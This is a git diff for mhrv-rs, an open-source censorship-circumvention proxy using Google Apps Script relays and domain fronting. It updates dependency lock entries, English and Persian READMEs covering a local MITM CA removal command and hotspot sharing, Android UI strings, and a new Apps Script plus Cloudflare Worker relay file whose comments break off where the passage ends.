[[package]] name = "wit-bindgen" version = "0.57.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1ebf944e87a7c253233ad6766e082e3cd714b5d03812acc24c318f549614536e" +[[package]] +name = "wit-bindgen-core" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ea61de684c3ea68cb082b7a88508a8b27fcc8b797d738bfc99a82facf1d752dc" +dependencies = [ + "anyhow", + "heck", + "wit-parser", +] + +[[package]] +name = "wit-bindgen-rust" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b7c566e0f4b284dd6561c786d9cb0142da491f46a9fbed79ea69cdad5db17f21" +dependencies = [ + "anyhow", + "heck", + "indexmap", + "prettyplease", + "syn 2.0.117", + "wasm-metadata", + "wit-bindgen-core", + "wit-component", +] + +[[package]] +name = "wit-bindgen-rust-macro" +version = "0.51.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0c0f9bfd77e6a48eccf51359e3ae77140a7f50b1e2ebfe62422d8afdaffab17a" +dependencies = [ + "anyhow", + "prettyplease", + "proc-macro2", + "quote", + "syn 2.0.117", + "wit-bindgen-core", + "wit-bindgen-rust", +] + +[[package]] +name = "wit-component" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2" +dependencies = [ + "anyhow", + "bitflags 2.11.1", + "indexmap", + "log", + "serde", + "serde_derive", + "serde_json", + "wasm-encoder", + "wasm-metadata", + "wasmparser", + "wit-parser", +] + +[[package]] +name = "wit-parser" +version = "0.244.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ecc8ac4bc1dc3381b7f59c34f00b67e18f910c2c0f50015669dde7def656a736" +dependencies = [ + "anyhow", + "id-arena", + "indexmap", + "log", + "semver", + "serde", + "serde_derive", + "serde_json", + "unicode-xid", + "wasmparser", +] + [[package]] name = "writeable" version = "0.6.3" diff --git 
a/Cargo.toml b/Cargo.toml index e7fdae86..7d7b3c02 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "mhrv-rs" -version = "1.6.0" +version = "1.9.2" edition = "2021" description = "Rust port of MasterHttpRelayVPN -- DPI bypass via Google Apps Script relay with domain fronting" license = "MIT" @@ -94,11 +94,15 @@ libc = "0.2" # traffic black-holes (symptom: Chrome shows DNS_PROBE_STARTED). [target.'cfg(target_os = "android")'.dependencies] jni = { version = "0.21", default-features = false } -tun2proxy = { version = "0.7", default-features = false } +tun2proxy = { version = "0.7", default-features = false, features = ["udpgw"] } [dev-dependencies] # Used in mitm tests to sanity-check the cert extensions we emit. x509-parser = "0.16" +# `test-util` enables `tokio::test(start_paused = true)` so timing- +# sensitive tests in `tunnel_client` (the empty-poll cadence) can +# auto-advance virtual time instead of burning real wall-clock seconds. +tokio = { version = "1", features = ["test-util"] } [profile.release] panic = "abort" diff --git a/README.md b/README.md index 938d10c1..b4a9980f 100644 --- a/README.md +++ b/README.md @@ -102,14 +102,16 @@ This part is unchanged from the original project. Follow @masterking32's guide o - Who has access: **Anyone** 6. Copy the **Deployment ID** (the long random string in the URL). +> **Alternative backend — Apps Script + Cloudflare Worker.** A variant in [`assets/apps_script/Code.cfw.gs`](assets/apps_script/Code.cfw.gs) + [`assets/cloudflare/worker.js`](assets/cloudflare/worker.js) turns Apps Script into a thin forwarder and offloads the actual fetch to a Cloudflare Worker you deploy. The win on day one is **latency** (~10-50 ms at the CF edge vs ~250-500 ms in Apps Script — visibly snappier for browsing and Telegram). 
It does **not** reduce your daily 20k Apps Script `UrlFetchApp` count, because today's mhrv-rs always sends single-URL relay requests; the batch path on the GAS+Worker side is wired and ready (`ceil(N/40)` quota per N-URL batch) but no shipping client emits it. Trade-offs: worse for YouTube long-form (30 s wall vs 6 min), no fix for Cloudflare anti-bot, **not compatible with `mode: "full"`** (no tunnel-ops support → won't help WhatsApp/messengers on Android full mode). Full setup and trade-off table in [`assets/cloudflare/README.md`](assets/cloudflare/README.md). mhrv-rs needs no config changes — same `mode: "apps_script"`, same `script_id`, same `auth_key`. + #### Can't reach `script.google.com` from your network? -If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1's browser connection to succeed *before* you have a relay to use. `mhrv-rs` ships a small bootstrap mode for exactly this: `google_only`. +If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1's browser connection to succeed *before* you have a relay to use. `mhrv-rs` ships a `direct` mode for exactly this — SNI-rewrite tunnel only, no Apps Script relay required. (Was named `google_only` before v1.9 — the old name is still accepted in config files.) 1. Build / download the binary as in Step 2 below. -2. Copy [`config.google-only.example.json`](config.google-only.example.json) to `config.json` — no `script_id`, no `auth_key` required. +2. Copy [`config.direct.example.json`](config.direct.example.json) to `config.json` — no `script_id`, no `auth_key` required. 3. Run `mhrv-rs serve` and set your browser's HTTP proxy to `127.0.0.1:8085`. -4. In `google_only` mode the proxy only relays `*.google.com`, `*.youtube.com`, and the other Google-edge hosts via the same SNI-rewrite tunnel the full client uses. Other traffic goes direct — no Apps Script relay exists yet. +4. 
In `direct` mode the proxy only routes `*.google.com`, `*.youtube.com`, and the other Google-edge hosts (plus any [`fronting_groups`](docs/fronting-groups.md) you've configured) via the SNI-rewrite tunnel. Other traffic goes raw — no Apps Script relay exists yet. 5. Do Step 1 in your browser (the connection to `script.google.com` will be SNI-fronted). Deploy Code.gs, copy the Deployment ID. 6. In the desktop UI or the Android app (or by editing `config.json`) switch the mode back to `apps_script`, paste the Deployment ID and your auth key, and restart. @@ -135,7 +137,7 @@ To route your browser's HTTPS traffic through the Apps Script relay, `mhrv-rs` h - A fresh CA keypair (`ca/ca.crt` + `ca/ca.key`) is generated **on your machine**, in your user-data dir. - The public `ca.crt` is added to your system trust store so browsers accept the per-site certificates `mhrv-rs` mints on the fly. This is the step that needs sudo / Administrator. - The private `ca.key` **never leaves your machine**. Nothing uploads it, nothing phones home, and no remote party — including the Apps Script relay — can use it to impersonate sites to you. -- You can revoke it at any time by deleting the CA from your OS keychain (macOS: Keychain Access → System → delete `mhrv-rs`) / Windows cert store / `/etc/ca-certificates`, and removing the `ca/` folder. +- You can revoke it at any time with `mhrv-rs --remove-cert` (or the **Remove CA** button in the UI) — it clears the CA from the OS trust store, verifies the revocation by name before touching disk, and deletes the on-disk `ca/` folder. NSS cleanup (Firefox profiles + Chrome/Chromium on Linux) is best-effort: if `certutil` from libnss3-tools isn't on PATH or a browser has the NSS DB locked, the tool logs a manual-cleanup hint. `config.json` and your Apps Script deployment are not touched, so regenerating the CA never requires redeploying `Code.gs`. 
Manual fallback: the certificate's Common Name is `MasterHttpRelayVPN` (not `mhrv-rs` — that's the app name, not the cert name). Delete by that CN in your OS keychain (macOS: Keychain Access → System → delete `MasterHttpRelayVPN`), Windows `certmgr.msc` → Trusted Root Certification Authorities, or `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` + `sudo update-ca-certificates` on Linux; remove the `MasterHttpRelayVPN` entry from each browser's cert settings; and remove the `ca/` folder under the user-data dir. The launcher does all of this for you and then starts the UI: @@ -197,9 +199,14 @@ Then: ./mhrv-rs test # one-shot end-to-end probe ./mhrv-rs scan-ips # rank Google frontend IPs by latency ./mhrv-rs --install-cert # reinstall the MITM CA +./mhrv-rs --remove-cert # clean slate: uninstall + delete the whole ca/ dir ./mhrv-rs --help ``` +`--remove-cert` deletes the CA from the OS trust store, deletes the on-disk `ca/` directory, and verifies the revocation by name — if a system-level delete needed admin you didn't have, it aborts the file deletion and prints an error so you can re-run elevated. NSS cleanup (Firefox profiles + Chrome/Chromium on Linux) is best-effort: if `certutil` isn't on PATH or a browser holds the NSS DB open, the tool logs a manual-cleanup hint. Your `config.json` and the Apps Script deployment at `script.google.com` are untouched, so a fresh CA (generated next time you start the proxy) does not require redeploying `Code.gs`. + +> **Upgrading from pre-v1.2.11?** Earlier versions wrote a bare `user_pref("security.enterprise_roots.enabled", true);` into each Firefox profile's `user.js` without a provenance marker. `--remove-cert` intentionally does **not** strip that line — a bare pref is indistinguishable from one authored by the user or a corporate policy, and silently revoking trust behavior is worse than leaving one cosmetic orphan line. 
Firefox falls back to its built-in Mozilla root store the moment the MITM CA leaves the OS trust store, so this has no functional effect. Delete the line manually if it bothers you. + `script_id` can also be a JSON array: `["id1", "id2", "id3"]`. #### scan-ips configuration (optional) @@ -314,6 +321,26 @@ More deployments = more total concurrency = lower per-session latency. Each batc } ``` +## Sharing via hotspot (Android → iOS / laptop) + +The proxy listens on `0.0.0.0` by default, so any device on the same network can use it. This lets you share the tunnel from an Android phone to an iPhone, iPad, or laptop over hotspot: + +1. **Android**: enable mobile hotspot + start the app +2. **Other device**: connect to the Android hotspot WiFi +3. **Configure proxy** on the other device: + - **Server**: `192.168.43.1` (Android's default hotspot IP) + - **Port**: `8080` (HTTP) or `1081` (SOCKS5) + +### iOS setup +Settings → WiFi → tap (i) on the hotspot network → Configure Proxy → Manual → Server `192.168.43.1`, Port `8080`. + +For full device-wide coverage on iOS, use an app like [Shadowrocket](https://apps.apple.com/app/shadowrocket/id932747118) or [Potatso](https://apps.apple.com/app/potatso/id1239860606) — point it at the SOCKS5 proxy (`192.168.43.1:1081`) and it will route all traffic through the tunnel. + +### macOS / Windows +Set the system HTTP proxy to `192.168.43.1:8080` in network settings, or configure per-app SOCKS5 proxy to `192.168.43.1:1081`. + +> **Note**: if `listen_host` is set to `127.0.0.1` in your config, change it to `0.0.0.0` to allow connections from other devices. + ## Running on OpenWRT (or any musl distro) The `*-linux-musl-*` archives ship a fully static CLI that runs on OpenWRT, Alpine, and any libc-less Linux userland. Put the binary on the router and start it as a service: @@ -474,17 +501,21 @@ Donations cover hosting, self-hosted CI runner costs, and continued maintenance. 
> **نکته:** اگر نمی‌دانید رمز `AUTH_KEY` چه بگذارید، یک رشتهٔ تصادفی ۱۶ تا ۲۴ کاراکتری بسازید. مهم فقط این است که **دقیقاً همان رشته** را در برنامه هم وارد کنید. + + +> **پشتیبان جایگزین — `Apps Script` + `Cloudflare Worker`.** نسخه‌ای در [`assets/apps_script/Code.cfw.gs`](assets/apps_script/Code.cfw.gs) به‌همراه [`assets/cloudflare/worker.js`](assets/cloudflare/worker.js) وجود دارد که `Apps Script` را به یک رلهٔ نازک تبدیل می‌کند و کار `fetch` واقعی را به یک `Cloudflare Worker` که خودتان مستقر می‌کنید می‌سپارد. سود روز اول این کار **کاهش تأخیر** است (~۱۰ تا ۵۰ میلی‌ثانیه روی لبهٔ `CF` به جای ۲۵۰ تا ۵۰۰ میلی‌ثانیه روی `Apps Script` — برای مرور وب و تلگرام محسوس). سهمیهٔ روزانهٔ `UrlFetchApp` (~۲۰٬۰۰۰) را کاهش **نمی‌دهد**، چون امروز `mhrv-rs` همیشه درخواست تک‌آدرسی می‌فرستد؛ مسیر دسته‌ای روی `GAS+Worker` آماده و سیم‌کشی شده (`ceil(N/40)` سهمیه به‌ازای دستهٔ `N` آدرسی) ولی هیچ کلاینتی فعلاً آن را تولید نمی‌کند. مبادلات: ویدیوی طولانی یوتیوب بدتر می‌شود (دیوار ۳۰ ثانیه به جای ۶ دقیقه)، ضدبات `Cloudflare` را حل نمی‌کند، و **با `mode: "full"` سازگار نیست** (پشتیبانی از عملیات تونل ندارد → برای واتس‌اَپ و سایر مسنجرها روی اندرویدِ تونل کامل کمکی نمی‌کند). راهنمای کامل استقرار و جدول مبادلات در [`assets/cloudflare/README.fa.md`](assets/cloudflare/README.fa.md). در `mhrv-rs` هیچ تنظیمی تغییر نمی‌کند — همان `mode: "apps_script"`، همان `script_id`، همان `auth_key`. + #### به `script.google.com` هم دسترسی ندارید؟ -اگر `ISP` شما از قبل `Apps Script` (یا کل گوگل) را مسدود کرده، برای مرحلهٔ ۱ باید مرورگرتان **اول** به `script.google.com` برسد — قبل از اینکه رله‌ای داشته باشید. `mhrv-rs` یک حالت بوت‌استرپ کوچک دقیقاً برای همین دارد: `google_only`. +اگر `ISP` شما از قبل `Apps Script` (یا کل گوگل) را مسدود کرده، برای مرحلهٔ ۱ باید مرورگرتان **اول** به `script.google.com` برسد — قبل از اینکه رله‌ای داشته باشید. `mhrv-rs` یک حالت `direct` دقیقاً برای همین دارد — فقط تونل بازنویسی `SNI`، بدون نیاز به رلهٔ `Apps Script`. 
(قبل از v1.9 این حالت `google_only` نام داشت — نام قدیمی همچنان در فایل کانفیگ پذیرفته می‌شود.) ۱. برنامه را طبق مرحلهٔ ۲ پایین دانلود کنید -۲. فایل [`config.google-only.example.json`](config.google-only.example.json) را در کنار فایل اجرایی به نام `config.json` کپی کنید — نه `script_id` لازم دارد و نه `auth_key` +۲. فایل [`config.direct.example.json`](config.direct.example.json) را در کنار فایل اجرایی به نام `config.json` کپی کنید — نه `script_id` لازم دارد و نه `auth_key` ۳. برنامه را اجرا کنید و `HTTP proxy` مرورگرتان را روی `127.0.0.1:8085` تنظیم کنید -۴. در حالت `google_only`، پروکسی فقط `*.google.com`، `*.youtube.com` و بقیهٔ میزبان‌های لبهٔ گوگل را از طریق همان تونل بازنویسی `SNI` رد می‌کند. بقیهٔ ترافیک مستقیم می‌رود — هنوز رله‌ای در کار نیست +۴. در حالت `direct`، پروکسی فقط `*.google.com`، `*.youtube.com` و بقیهٔ میزبان‌های لبهٔ گوگل (به علاوهٔ هر [`fronting_groups`](docs/fronting-groups.md) که تنظیم کرده باشید) را از طریق تونل بازنویسی `SNI` رد می‌کند. بقیهٔ ترافیک مستقیم می‌رود — هنوز رله‌ای در کار نیست ۵. حالا مرحلهٔ ۱ را در مرورگر انجام دهید (اتصال به `script.google.com` با `SNI` فرونت می‌شود). `Code.gs` را مستقر کنید و `Deployment ID` را کپی کنید @@ -710,9 +741,15 @@ logread -e mhrv-rs -f **چطور گواهی را بعداً حذف کنم؟** -- **مک:** `Keychain Access` را باز کنید، در بخش `System` دنبال `mhrv-rs` بگردید و حذف کنید. 
سپس پوشهٔ `~/Library/Application Support/mhrv-rs/ca/` را پاک کنید -- **ویندوز:** `certmgr.msc` را اجرا کنید → `Trusted Root Certification Authorities` → `Certificates` → دنبال `mhrv-rs` بگردید و حذف کنید -- **لینوکس:** فایل `/usr/local/share/ca-certificates/mhrv-rs.crt` را حذف و `sudo update-ca-certificates` اجرا کنید +- **ساده‌ترین راه (هر سه سیستم‌عامل):** داخل برنامه روی دکمهٔ **`Remove CA`** بزنید، یا در ترمینال: + - مک/لینوکس: `sudo ./mhrv-rs --remove-cert` + - ویندوز (با `Run as administrator`): `mhrv-rs.exe --remove-cert` + - این دستور گواهی را از `trust store` سیستم و `NSS` (فایرفاکس/کروم) پاک می‌کند و فایل‌های `ca/ca.crt` و `ca/ca.key` را هم روی دیسک حذف می‌کند. فایل `config.json` و `deployment` آپس‌اسکریپت دست‌نخورده می‌مانند — پس لازم نیست `Code.gs` را دوباره دیپلوی کنید. +- **به‌صورت دستی** (اگر می‌خواهید): + - **نکته:** نام گواهی (`Common Name`) در همهٔ مکان‌ها `MasterHttpRelayVPN` است — `mhrv-rs` نام برنامه است، نه نام گواهی. + - **مک:** `Keychain Access` را باز کنید، در بخش `System` دنبال `MasterHttpRelayVPN` بگردید و حذف کنید. سپس پوشهٔ `~/Library/Application Support/mhrv-rs/ca/` را پاک کنید + - **ویندوز:** `certmgr.msc` را اجرا کنید → `Trusted Root Certification Authorities` → `Certificates` → دنبال `MasterHttpRelayVPN` بگردید و حذف کنید + - **لینوکس:** فایل `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` را حذف و `sudo update-ca-certificates` اجرا کنید **چند `Deployment ID` لازم دارم؟** یکی برای استفادهٔ عادی کافی است. سهمیهٔ روزانه `UrlFetchApp` برای حساب رایگان گوگل **۲۰٬۰۰۰ درخواست در روز** است (برای `Workspace` پولی ۱۰۰٬۰۰۰)، با محدودیت پاسخ ۵۰ مگابایت به ازای هر `fetch`. از هر حساب گوگل **فقط یک `Deployment`** بسازید — سقف ۳۰ درخواست همزمان به ازای هر حساب است، پس چند `Deployment` روی یک حساب همزمانی اضافه نمی‌کند. برای افزایش همزمانی یا سهمیهٔ روزانه، در حساب‌های گوگل دیگر `Deployment` بسازید — هر حساب سهمیهٔ ۲۰ هزار درخواستی و ۳۰ اجرای همزمان خودش را دارد. 
همهٔ `ID`ها را در فیلد `Apps Script ID(s)` وارد کنید — برنامه خودکار بینشان می‌چرخد. مرجع: @@ -735,9 +772,12 @@ logread -e mhrv-rs -f ./mhrv-rs scan-ips # رتبه‌بندی IPهای گوگل بر اساس سرعت ./mhrv-rs test-sni # تست نام‌های SNI در pool ./mhrv-rs --install-cert # نصب مجدد گواهی +./mhrv-rs --remove-cert # حذف کامل گواهی: پاک‌سازی trust store و کل پوشهٔ ca/ ./mhrv-rs --help ``` +دستور `--remove-cert` گواهی را از `trust store` سیستم پاک می‌کند، با بررسی نام تأیید می‌کند که حذف انجام شده، و سپس پوشهٔ `ca/` روی دیسک را حذف می‌کند — اگر حذف نیاز به دسترسی ادمین داشته باشد که در دسترس نبوده، قبل از پاک کردن فایل‌ها متوقف می‌شود تا بتوانید با دسترسی مدیر دوباره اجرا کنید. پاک‌سازی `NSS` (فایرفاکس/کروم) `best-effort` است: اگر `certutil` نصب نباشد یا یکی از مرورگرها بازِ دیتابیس را قفل کرده باشد، ابزار پیغامی با راهنمای پاک‌سازی دستی نشان می‌دهد. فایل `config.json` شما و `deployment` آپس‌اسکریپت در `script.google.com` دست‌نخورده می‌مانند — یعنی وقتی در اجرای بعدی گواهی تازه تولید می‌شود، نیازی به دیپلوی مجدد `Code.gs` نیست. + **چرا گاهی جست‌وجوی گوگل بدون `JavaScript` نشان داده می‌شود؟** `Apps Script` مجبور است `User-Agent` درخواست‌های خود را روی `Google-Apps-Script` بگذارد. بعضی سایت‌ها این را به عنوان ربات شناسایی می‌کنند و نسخهٔ سادهٔ بدون `JavaScript` برمی‌گردانند. دامنه‌هایی که در لیست `SNI-rewrite` قرار گرفته‌اند (مثل `google.com`، `youtube.com`) از این مشکل در امان هستند چون مستقیماً از لبهٔ گوگل می‌آیند، نه از `Apps Script`. diff --git a/SF_README.md b/SF_README.md index 2648c790..a172fd8e 100644 --- a/SF_README.md +++ b/SF_README.md @@ -23,7 +23,7 @@ A free way to bypass internet censorship by routing your traffic through your ow **1. Set up the relay in your Google account (one-time).** Go to , sign in, click **New project**. Delete the sample code, paste in the [Code.gs file from this repo](assets/apps_script/Code.gs), change `AUTH_KEY = "..."` to a password only you know. Click **Deploy → New deployment → Web app**, set "Execute as: Me", "Who has access: Anyone". 
Copy the long ID from the URL — that's your **Deployment ID**. -> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `google_only` mode (use [`config.google-only.example.json`](config.google-only.example.json)). It only relays Google sites and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode. +> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `direct` mode (use [`config.direct.example.json`](config.direct.example.json)). It only relays Google sites (plus any [fronting_groups](docs/fronting-groups.md) you've configured) and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode. (`direct` was named `google_only` before v1.9 — the old name still works.) **2. Install and run mhrv-rs.** Download the package for your system from [Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) and unzip it. @@ -94,7 +94,7 @@ This project is free and run by volunteers. If it helped you and you can spare a **۱. ساخت ریله در حساب گوگل (فقط یک بار).** به بروید، وارد حساب گوگل شوید و روی **New project** بزنید. کد پیش‌فرض را پاک کنید و محتوای [فایل Code.gs](assets/apps_script/Code.gs) همین مخزن را در آن جای‌گذاری کنید. خط `AUTH_KEY = "..."` را به یک رمز دلخواه که فقط خودتان می‌دانید تغییر دهید. سپس **Deploy → New deployment → Web app** را بزنید، گزینهٔ "Execute as: Me" و "Who has access: Anyone" را انتخاب کنید. آی‌دی طولانی توی URL را کپی کنید — این **Deployment ID** شماست. -> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `google_only` اجرا کنید (از [`config.google-only.example.json`](config.google-only.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید. 
+> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `direct` اجرا کنید (از [`config.direct.example.json`](config.direct.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل (به علاوهٔ هر [fronting_groups](docs/fronting-groups.md) که تنظیم کرده باشید) را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید. (نام قبلی این حالت `google_only` بود — همچنان پذیرفته می‌شود.) **۲. نصب و اجرای mhrv-rs.** بستهٔ مخصوص سیستم خودتان را از [بخش Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) دانلود کنید و از حالت فشرده در بیاورید. diff --git a/android/app/build.gradle.kts b/android/app/build.gradle.kts index 29671b31..2cb00e5f 100644 --- a/android/app/build.gradle.kts +++ b/android/app/build.gradle.kts @@ -14,8 +14,8 @@ android { applicationId = "com.therealaleph.mhrv" minSdk = 24 // Android 7.0 — covers 99%+ of live devices. targetSdk = 34 - versionCode = 139 - versionName = "1.6.0" + versionCode = 158 + versionName = "1.8.1" // Ship all four mainstream Android ABIs: // - arm64-v8a — 95%+ of real-world Android phones since 2019 @@ -136,6 +136,10 @@ dependencies { implementation("androidx.compose.material3:material3") implementation("androidx.compose.material:material-icons-extended") + // QR code generation + scanning (self-contained, no ML Kit needed). 
+ implementation("com.google.zxing:core:3.5.3") + implementation("com.journeyapps:zxing-android-embedded:4.3.0") + debugImplementation("androidx.compose.ui:ui-tooling") debugImplementation("androidx.compose.ui:ui-test-manifest") } diff --git a/android/app/src/main/AndroidManifest.xml b/android/app/src/main/AndroidManifest.xml index dd2e94e8..4d74ca5c 100644 --- a/android/app/src/main/AndroidManifest.xml +++ b/android/app/src/main/AndroidManifest.xml @@ -53,8 +53,33 @@ + + + + + + + + + + + + + + + آدرس‌(های) Deployment یا Script ID + یک URL/ID، یا چند مورد با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا کنید کلید احراز (auth_key) google_ip دامنهٔ فرانت @@ -52,7 +54,7 @@ تغییر زبان - URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل. + URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. می‌توانید چند مورد را یک‌جا در فیلد افزودن جای‌گذاری کنید — با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا می‌شوند. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل. همان رمز مشترکی که داخل Apps Script گذاشتید. هنگام اتصال، مجوز VPN سیستم درخواست می‌شود. تمام ترافیک دستگاه به‌صورت خودکار رد می‌شود. بدون VPN سیستم. بعد از اتصال، پروکسی Wi-Fi را روی 127.0.0.1:%1$d (HTTP) یا %2$d (SOCKS5) تنظیم کنید. فقط برنامه‌هایی که تنظیمات پروکسی را رعایت می‌کنند رد می‌شوند. @@ -65,6 +67,8 @@ بررسی TLS طرف مقابل خاموش کردن، بررسی گواهی را برای لبهٔ گوگل غیرفعال می‌کند. فقط برای اشکال‌زدایی کاربرد دارد. + ارسال یوتیوب از طریق رله + ترافیک youtube.com / youtu.be / ytimg.com را به‌جای تونل SNI-rewrite از رلهٔ Apps Script عبور می‌دهد. حالت محدود را دور می‌زند ولی پخش ویدیو کندتر می‌شود. log_level parallel_relay: %1$d تعداد درخواست‌های موازی هر بار. ۱ عادی است؛ روی لینک‌های با افت، ۲-۳ را امتحان کنید. 
@@ -78,6 +82,7 @@ google_ip به %1$s به‌روزرسانی شد google_ip قبلاً به‌روز است (%1$s) خطای DNS — اتصال شبکه را بررسی کنید + لاگ‌ها در کلیپ‌بورد کپی شدند مصرف امروز (تخمینی) diff --git a/android/app/src/main/res/values/strings.xml b/android/app/src/main/res/values/strings.xml index 8aa47b4c..002f66e7 100644 --- a/android/app/src/main/res/values/strings.xml +++ b/android/app/src/main/res/values/strings.xml @@ -24,11 +24,13 @@ Test Add Clear + Copy Install Cancel Deployment URL(s) or script ID(s) + Paste one URL/ID, or many separated by newline / space / comma / semicolon auth_key google_ip front_domain @@ -52,7 +54,7 @@ Switch language - Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode. + Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Paste many at once into the Add field — they\'ll be split on newline / space / comma / semicolon. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode. The shared secret you set in the Apps Script. Requests the OS VPN grant on Connect. All device traffic is routed automatically. No OS VPN. Set your Wi-Fi proxy to 127.0.0.1:%1$d (HTTP) or %2$d (SOCKS5) after Connect. Only apps that honour the proxy settings will tunnel. @@ -65,6 +67,8 @@ Verify upstream TLS Off disables cert checks for the Google edge. Only useful for debugging. + Send YouTube through relay + Route youtube.com / youtu.be / ytimg.com through Apps Script relay instead of SNI-rewrite tunnel. Avoids restricted mode but slower for video. log_level parallel_relay: %1$d Fan-out per request. 1 is normal; bump to 2-3 on lossy links. @@ -74,10 +78,26 @@ %1$d lines + + Paste config from clipboard + Export config + Show QR code + Scan QR code + Copy to clipboard + Config imported + Config copied to clipboard + Invalid config in clipboard + Export config + This includes your auth_key. Only share with people you trust. 
+ Import config? + This will replace your current settings. + Camera permission needed to scan QR codes + google_ip updated to %1$s google_ip already current (%1$s) DNS lookup failed — check network + Logs copied to clipboard Usage today (estimated) diff --git a/android/app/src/main/res/xml/file_paths.xml b/android/app/src/main/res/xml/file_paths.xml new file mode 100644 index 00000000..1e63d103 --- /dev/null +++ b/android/app/src/main/res/xml/file_paths.xml @@ -0,0 +1,4 @@ + + + + diff --git a/assets/apps_script/Code.cfw.gs b/assets/apps_script/Code.cfw.gs new file mode 100644 index 00000000..f455fe20 --- /dev/null +++ b/assets/apps_script/Code.cfw.gs @@ -0,0 +1,360 @@ +/** + * DomainFront Relay — Apps Script with Cloudflare Worker exit. + * + * Variant of Code.gs that off-loads the actual outbound HTTP fetch to + * a Cloudflare Worker. Apps Script becomes a thin auth-and-forward + * relay; Cloudflare does the work and pays the latency. + * + * mhrv-rs ──► Apps Script (this file) ──► Cloudflare Worker ──► target + * ▲ inbound auth & batch ▲ outbound fetch + base64 + * + * Wire protocol with mhrv-rs is identical to Code.gs: + * 1. Single: POST { k, m, u, h, b, ct, r } → { s, h, b } + * 2. Batch: POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] } + * Both shapes are forwarded to the Worker as one POST per call + * from Apps Script: single mode posts {k, u, m, ...} once, batch + * mode posts {k, q: [...]} once. The Worker fans out batches + * internally via Promise.all. This is the design choice that + * makes Code.cfw.gs actually save GAS UrlFetchApp quota — without + * it we'd have to fetchAll(N worker calls) and end up at parity + * with the standard Code.gs. + * + * Trade-off summary (read before deploying): + * + Per-call latency drops from ~250-500 ms (Apps Script internal + * hop) to ~10-50 ms (CF edge). Visibly snappier for chat-style + * workloads (Telegram, page navigation). 
+ * + Apps Script *runtime* quota (90 min/day on consumer accounts) + * stretches significantly because each call now spends almost all + * its time in the network leg to the Worker, not in the body + * fetch + base64 + header processing. + * + Apps Script *UrlFetchApp count* quota stretches roughly Nx for + * an N-URL batch because the batch is sent as a small number of + * POSTs to the Worker (one per chunk of WORKER_BATCH_CHUNK URLs), + * not fanned out per-URL via fetchAll. For mhrv-rs's typical + * 5-30 URL batches that's 1 GAS call (vs N under standard + * Code.gs). Single non-batched requests still count 1:1. + * - YouTube long-form streaming gets WORSE. Apps Script allows + * ~6 min wall per execution; CF Workers cap at 30 s wall. The + * SABR cliff hits sooner. For YouTube-heavy use, keep the + * standard Code.gs (apps_script mode). + * - Batch mode now has a per-batch wall, not per-URL: Promise.all + * resolves only when every fetch finishes, so the slowest URL + * dominates. mhrv-rs already retries failed batch items + * individually, so failure modes are graceful, but it's a real + * behavioural change vs Code.gs's per-URL fetchAll wall. + * - Cloudflare anti-bot challenges on destination sites can be + * stricter — exit IP is now in CF's own range, which CF's + * anti-bot fingerprints as a worker-internal request. This is + * a different problem than DPI bypass; not solved by either + * variant. + * + * Deployment: + * 1. Deploy assets/cloudflare/worker.js to Cloudflare Workers first + * (set its AUTH_KEY to a strong secret). + * 2. Note the *.workers.dev URL of that Worker. + * 3. Open https://script.google.com → New project, delete default code. + * 4. Paste THIS entire file. + * 5. Set AUTH_KEY (must match the Worker's AUTH_KEY and your mhrv-rs + * config's auth_key — all three identical). + * 6. Set WORKER_URL to your *.workers.dev URL (must include https://). + * 7. 
Deploy → New deployment → Web app + * Execute as: Me | Who has access: Anyone + * 8. Copy the Deployment ID into mhrv-rs config.json as "script_id". + * mhrv-rs does not need to know about Cloudflare; it talks to + * Apps Script the same way it always has. + * + * CHANGE THESE TWO CONSTANTS BELOW. + * + * Upstream credit for the GAS-→-Worker pattern: github.com/denuitt1/mhr-cfw. + * This file inherits the hardening (decoy-on-bad-auth, hop-loop guard) + * from the standard Code.gs. + */ + +const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; + +// Full https://… URL of the Cloudflare Worker you deployed using +// assets/cloudflare/worker.js. Must include the scheme. +const WORKER_URL = "https://CHANGE_ME.workers.dev"; + +// ── Sentinels — DO NOT EDIT ───────────────────────────────── +// These two constants are NOT configuration. They are the literal +// template-default values used by the fail-closed check in doPost so +// that a forgotten edit 